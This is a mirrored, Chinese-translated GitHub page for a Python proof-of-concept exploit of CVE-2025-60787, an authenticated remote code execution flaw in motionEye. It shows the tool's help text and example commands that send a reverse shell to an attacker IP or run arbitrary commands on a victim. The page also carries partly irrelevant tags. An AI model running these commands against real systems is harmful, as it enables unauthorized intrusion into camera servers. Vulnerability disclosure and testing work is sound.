gunzf0x/CVE-2025-60787

GitHub: gunzf0x/CVE-2025-60787

针对 CVE-2025-60787 的 Python PoC 脚本,在已获取凭证的前提下对 motionEye 受影响版本实现远程命令执行或反弹 Shell。

Stars: 0 | Forks: 0

# CVE-2025-60787 - motionEye 中的认证 RCE 针对 [CVE-2025-60787](https://nvd.nist.gov/vuln/detail/CVE-2025-60787) 的 PoC,这是 [motionEye](https://github.com/motioneye-project/motioneye) 中的一个认证 RCE 漏洞,影响版本最高至 0.43.1b4(含)。 这是针对 [此仓库](https://github.com/prabhatverma47/CVE-2025-60787) 中描述的漏洞的自动化 PoC。归功于 [prabhatverma47](https://github.com/prabhatverma47/)。 ## 用法 该脚本有 2 个利用该漏洞的命令。一个是直接发送 reverse shell 的命令 `revshell`,另一个是利用此 CVE 直接执行命令的命令 `command`。 ``` ❯ python3 CVE-2025-60787.py -h usage: CVE-2025-60787.py [-h] {revshell,command} ... PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x positional arguments: {revshell,command} Choose between send a reverse shell or (attempting to) run commands revshell Attempt to send a reverse shell using CVE-2025-60787 vuln command Execute a command remotely using CVE-2025-60787 vuln options: -h, --help show this help message and exit ``` ### Reverse Shell 使用 `revshell` 命令获取 shell。例如: ``` python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001 ``` 其中 `10.10.10.10` 是目标机器(运行 `motionEye` 的机器),`10.10.10.15` 是我们的攻击者机器,`9001` 是我们用来接收 reverse shell 的端口。 ### 命令执行 如果我们想远程执行其他命令而不是 reverse shell,可以使用 `command` 选项。例如,在受害机器上执行命令 `ping -c1 10.10.10.15`: ``` python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15' ``` 其中 `10.10.10.10` 是运行 `motionEye` 的机器。 ## 免责声明 使用此脚本的风险由您自己承担。 请遵守道德规范 (:
标签:CISA项目, CVE-2025-60787, Exploit, IoT安全, Maven, motionEye, PE 加载器, PoC, Python, RCE, 反向Shell, 安全测试, 开源监控, 摄像机监控, 攻击性安全, 无后门, 暴力破解, 漏洞验证, 编程工具, 网络安全, 认证后RCE, 远程代码执行, 隐私保护